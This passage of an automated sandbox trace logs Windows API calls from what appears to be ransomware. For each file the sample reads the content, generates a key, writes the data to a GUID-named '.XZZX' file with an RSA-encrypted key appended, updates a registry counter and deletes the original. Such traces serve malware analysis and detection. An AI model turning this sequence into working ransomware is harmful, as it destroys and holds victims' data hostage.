lstrcpyW (in: lpString1=0x29af460, lpString2="7IFRA25.gif" | out: lpString1="7IFRA25.gif") returned="7IFRA25.gif" [0171.241] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\" [0171.241] SetErrorMode (uMode=0x1) returned 0x1 [0171.241] lstrcpyW (in: lpString1=0x29af860, lpString2="7IFRA25.gif" | out: lpString1="7IFRA25.gif") returned="7IFRA25.gif" [0171.241] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0x62baf7fd, Data2=0x1e5d, Data3=0x44bd, Data4=([0]=0xbd, [1]=0x44, [2]=0x22, [3]=0x76, [4]=0x0, [5]=0xd7, [6]=0x97, [7]=0xcc))) returned 0x0 [0171.241] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\7IFRA25.gif") returned 77 [0171.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0171.241] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\C6FBBCE908271EA962BAF7FD0AC202F1.XZZX") returned 103 [0171.241] StrStrW (lpFirst="7IFRA25.gif", lpSrch="XZZX") returned 0x0 [0171.241] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\7IFRA25.gif", dwFileAttributes=0x20) returned 1 [0171.242] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\7IFRA25.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zbiozr_ 3-6w\\3yo4kg3p-k\\7ifra25.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa00 [0171.242] ReadFile (in: hFile=0xa00, lpBuffer=0x43b7d70, nNumberOfBytesToRead=0x72ae, lpNumberOfBytesRead=0x29ae418, lpOverlapped=0x0 | out: lpBuffer=0x43b7d70*, lpNumberOfBytesRead=0x29ae418*=0x72ae, lpOverlapped=0x0) returned 1 [0171.243] CloseHandle (hObject=0xa00) returned 1 [0171.243] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x1c60000 [0171.243] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x1c70000 [0171.244] SetErrorMode (uMode=0x1) returned 0x1 [0171.244] lstrcpyW (in: lpString1=0x29ae358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0171.244] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x43a6020) returned 1 [0171.246] CryptGenKey (in: hProv=0x43a6020, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3cde9d8) returned 1 [0171.359] CryptExportKey (in: hKey=0x3cde9d8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ae41c | out: pbData=0x0*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0171.359] CryptExportKey (in: hKey=0x3cde9d8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x1c70000, pdwDataLen=0x29ae41c | out: pbData=0x1c70000*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0171.359] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0171.359] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0171.359] CryptDestroyKey (hKey=0x3cde9d8) returned 1 [0171.360] CryptReleaseContext (hProv=0x43a6020, dwFlags=0x0) returned 1 [0171.360] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\C6FBBCE908271EA962BAF7FD0AC202F1.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zbiozr_ 3-6w\\3yo4kg3p-k\\c6fbbce908271ea962baf7fd0ac202f1.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa00 [0171.360] WriteFile (in: hFile=0xa00, lpBuffer=0x43b7d70*, nNumberOfBytesToWrite=0x72ae, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x43b7d70*, lpNumberOfBytesWritten=0x29ae438*=0x72ae, lpOverlapped=0x0) returned 1 [0171.361] SetFilePointer (in: hFile=0xa00, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x72ae [0171.361] WriteFile (in: hFile=0xa00, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0171.361] SetFilePointer (in: hFile=0xa00, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x72b3 [0171.361] WriteFile (in: hFile=0xa00, lpBuffer=0x29af860*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x29af860*, lpNumberOfBytesWritten=0x29ae438*=0x16, lpOverlapped=0x0) returned 1 [0171.361] SetFilePointer (in: hFile=0xa00, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x72c9 [0171.361] WriteFile (in: hFile=0xa00, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0171.361] SetFilePointer (in: hFile=0xa00, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x72ce [0171.361] SetErrorMode (uMode=0x1) returned 0x1 [0171.361] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0171.361] OutputDebugStringW (lpOutputString="end") [0171.361] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v¨\x8eÊ\x03`Õ\x9a\x02â", cchString=0x0, dwFlags=0x0, pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0171.361] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x29adbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8 | out: pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8) returned 1 [0171.361] CryptAcquireContextW (in: phProv=0x29ad3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x29ad3e4*=0x43a6020) returned 1 [0171.362] CryptImportPublicKeyInfo (in: hCryptProv=0x43a6020, dwCertEncodingType=0x1, pInfo=0x43a31a0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x43a31d0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x43a31d8*, PublicKey.cUnusedBits=0x0), phKey=0x29ad3ec | out: phKey=0x29ad3ec*=0x3cdeb18) returned 1 [0171.362] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0171.362] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0171.362] CryptEncrypt (in: hKey=0x3cdeb18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ad3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x29ad3f0*=0x80) returned 1 [0171.362] CryptEncrypt (in: hKey=0x3cdeb18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x43a60a8*, pdwDataLen=0x29ad3e8*=0x75, dwBufLen=0x80 | out: pbData=0x43a60a8*, pdwDataLen=0x29ad3e8*=0x80) returned 1 [0171.362] WriteFile (in: hFile=0xa00, lpBuffer=0x43a60a8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x43a60a8*, lpNumberOfBytesWritten=0x29ae438*=0x80, lpOverlapped=0x0) returned 1 [0171.362] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0171.362] WriteFile (in: hFile=0xa00, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0171.362] GetUserNameW (in: lpBuffer=0x29ae1f8, pcbBuffer=0x29adfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x29adfe0) returned 1 [0171.363] wsprintfW (in: param_1=0x29adff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0171.363] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe4 | out: phkResult=0x29adfe4*=0xa14) returned 0x0 [0171.363] RegQueryValueExW (in: hKey=0xa14, lpValueName="E1010314", lpReserved=0x0, lpType=0x29adfd8, lpData=0x29adfec, lpcbData=0x29adfdc*=0x4 | out: lpType=0x29adfd8*=0x4, lpData=0x29adfec*=0x108, lpcbData=0x29adfdc*=0x4) returned 0x0 [0171.363] RegCloseKey (hKey=0xa14) returned 0x0 [0171.363] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe8 | out: phkResult=0x29adfe8*=0xa14) returned 0x0 [0171.363] RegSetValueExW (in: hKey=0xa14, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x29adfec*=0x109, cbData=0x4 | out: lpData=0x29adfec*=0x109) returned 0x0 [0171.363] RegCloseKey (hKey=0xa14) returned 0x0 [0171.363] VirtualFree (lpAddress=0x1c60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0171.363] VirtualFree (lpAddress=0x1c70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0171.363] CloseHandle (hObject=0xa00) returned 1 [0171.363] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0171.364] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0171.364] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\7IFRA25.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zbiozr_ 3-6w\\3yo4kg3p-k\\7ifra25.gif")) returned 1 [0171.364] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\7IFRA25.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zbiozr_ 3-6w\\3yo4kg3p-k\\7ifra25.gif")) returned 0 Thread: id = 590 os_tid = 0x730 [0171.372] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0171.372] lstrcpyW (in: lpString1=0x29af460, lpString2="zd0bLbxkM-mx4VZDX_.flv" | out: lpString1="zd0bLbxkM-mx4VZDX_.flv") returned="zd0bLbxkM-mx4VZDX_.flv" [0171.372] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\" [0171.372] SetErrorMode (uMode=0x1) returned 0x1 [0171.372] lstrcpyW (in: lpString1=0x29af860, lpString2="zd0bLbxkM-mx4VZDX_.flv" | out: lpString1="zd0bLbxkM-mx4VZDX_.flv") returned="zd0bLbxkM-mx4VZDX_.flv" [0171.372] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0x3ee0d4e8, Data2=0xc232, Data3=0x402c, Data4=([0]=0x96, [1]=0x5b, [2]=0x71, [3]=0xc8, [4]=0x67, [5]=0x0, [6]=0x91, [7]=0x32))) returned 0x0 [0171.372] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\zd0bLbxkM-mx4VZDX_.flv") returned 88 [0171.372] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0171.372] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\A941655030ADE0983EE0D4E83348C4E0.XZZX") returned 103 [0171.372] StrStrW (lpFirst="zd0bLbxkM-mx4VZDX_.flv", lpSrch="XZZX") returned 0x0 [0171.373] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\zd0bLbxkM-mx4VZDX_.flv", dwFileAttributes=0x20) returned 1 [0171.373] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\zd0bLbxkM-mx4VZDX_.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zbiozr_ 3-6w\\3yo4kg3p-k\\zd0blbxkm-mx4vzdx_.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa10 [0171.373] ReadFile (in: hFile=0xa10, lpBuffer=0x43b7d70, nNumberOfBytesToRead=0x1569f, lpNumberOfBytesRead=0x29ae418, lpOverlapped=0x0 | out: lpBuffer=0x43b7d70*, lpNumberOfBytesRead=0x29ae418*=0x1569f, lpOverlapped=0x0) returned 1 [0171.374] CloseHandle (hObject=0xa10) returned 1 [0171.374] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x1ca0000 [0171.374] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x1cb0000 [0171.375] SetErrorMode (uMode=0x1) returned 0x1 [0171.375] lstrcpyW (in: lpString1=0x29ae358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0171.375] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x43a6130) returned 1 [0171.377] CryptGenKey (in: hProv=0x43a6130, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3cde9d8) returned 1 [0171.527] CryptExportKey (in: hKey=0x3cde9d8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ae41c | out: pbData=0x0*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0171.527] CryptExportKey (in: hKey=0x3cde9d8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x1cb0000, pdwDataLen=0x29ae41c | out: pbData=0x1cb0000*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0171.527] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0171.528] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0171.528] CryptDestroyKey (hKey=0x3cde9d8) returned 1 [0171.528] CryptReleaseContext (hProv=0x43a6130, dwFlags=0x0) returned 1 [0171.528] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\A941655030ADE0983EE0D4E83348C4E0.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zbiozr_ 3-6w\\3yo4kg3p-k\\a941655030ade0983ee0d4e83348c4e0.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa10 [0171.528] WriteFile (in: hFile=0xa10, lpBuffer=0x43b7d70*, nNumberOfBytesToWrite=0x1569f, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x43b7d70*, lpNumberOfBytesWritten=0x29ae438*=0x1569f, lpOverlapped=0x0) returned 1 [0171.529] SetFilePointer (in: hFile=0xa10, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1569f [0171.530] WriteFile (in: hFile=0xa10, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0171.530] SetFilePointer (in: hFile=0xa10, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x156a4 [0171.530] WriteFile (in: hFile=0xa10, lpBuffer=0x29af860*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x29af860*, lpNumberOfBytesWritten=0x29ae438*=0x2c, lpOverlapped=0x0) returned 1 [0171.530] SetFilePointer (in: hFile=0xa10, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x156d0 [0171.530] WriteFile (in: hFile=0xa10, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0171.530] SetFilePointer (in: hFile=0xa10, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x156d5 [0171.530] SetErrorMode (uMode=0x1) returned 0x1 [0171.530] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0171.530] OutputDebugStringW (lpOutputString="end") [0171.530] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v¨\x8eÊ\x03`Õ\x9a\x02â", cchString=0x0, dwFlags=0x0, pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0171.530] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x29adbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8 | out: pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8) returned 1 [0171.530] CryptAcquireContextW (in: phProv=0x29ad3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x29ad3e4*=0x43a6130) returned 1 [0171.531] CryptImportPublicKeyInfo (in: hCryptProv=0x43a6130, dwCertEncodingType=0x1, pInfo=0x43a3270*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x43a32a0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x43a32a8*, PublicKey.cUnusedBits=0x0), phKey=0x29ad3ec | out: phKey=0x29ad3ec*=0x3cdeb58) returned 1 [0171.531] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0171.531] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0171.531] CryptEncrypt (in: hKey=0x3cdeb58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ad3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x29ad3f0*=0x80) returned 1 [0171.531] CryptEncrypt (in: hKey=0x3cdeb58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x43a61b8*, pdwDataLen=0x29ad3e8*=0x75, dwBufLen=0x80 | out: pbData=0x43a61b8*, pdwDataLen=0x29ad3e8*=0x80) returned 1 [0171.531] WriteFile (in: hFile=0xa10, lpBuffer=0x43a61b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x43a61b8*, lpNumberOfBytesWritten=0x29ae438*=0x80, lpOverlapped=0x0) returned 1 [0171.531] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0171.531] WriteFile (in: hFile=0xa10, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0171.531] GetUserNameW (in: lpBuffer=0x29ae1f8, pcbBuffer=0x29adfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x29adfe0) returned 1 [0171.532] wsprintfW (in: param_1=0x29adff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0171.532] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe4 | out: phkResult=0x29adfe4*=0xa18) returned 0x0 [0171.532] RegQueryValueExW (in: hKey=0xa18, lpValueName="E1010314", lpReserved=0x0, lpType=0x29adfd8, lpData=0x29adfec, lpcbData=0x29adfdc*=0x4 | out: lpType=0x29adfd8*=0x4, lpData=0x29adfec*=0x109, lpcbData=0x29adfdc*=0x4) returned 0x0 [0171.532] RegCloseKey (hKey=0xa18) returned 0x0 [0171.532] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe8 | out: phkResult=0x29adfe8*=0xa18) returned 0x0 [0171.532] RegSetValueExW (in: hKey=0xa18, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x29adfec*=0x10a, cbData=0x4 | out: lpData=0x29adfec*=0x10a) returned 0x0 [0171.532] RegCloseKey (hKey=0xa18) returned 0x0 [0171.532] VirtualFree (lpAddress=0x1ca0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0171.532] VirtualFree (lpAddress=0x1cb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0171.532] CloseHandle (hObject=0xa10) returned 1 [0171.532] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0171.533] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0171.533] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\zd0bLbxkM-mx4VZDX_.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zbiozr_ 3-6w\\3yo4kg3p-k\\zd0blbxkm-mx4vzdx_.flv")) returned 1 [0171.534] DeleteFileW 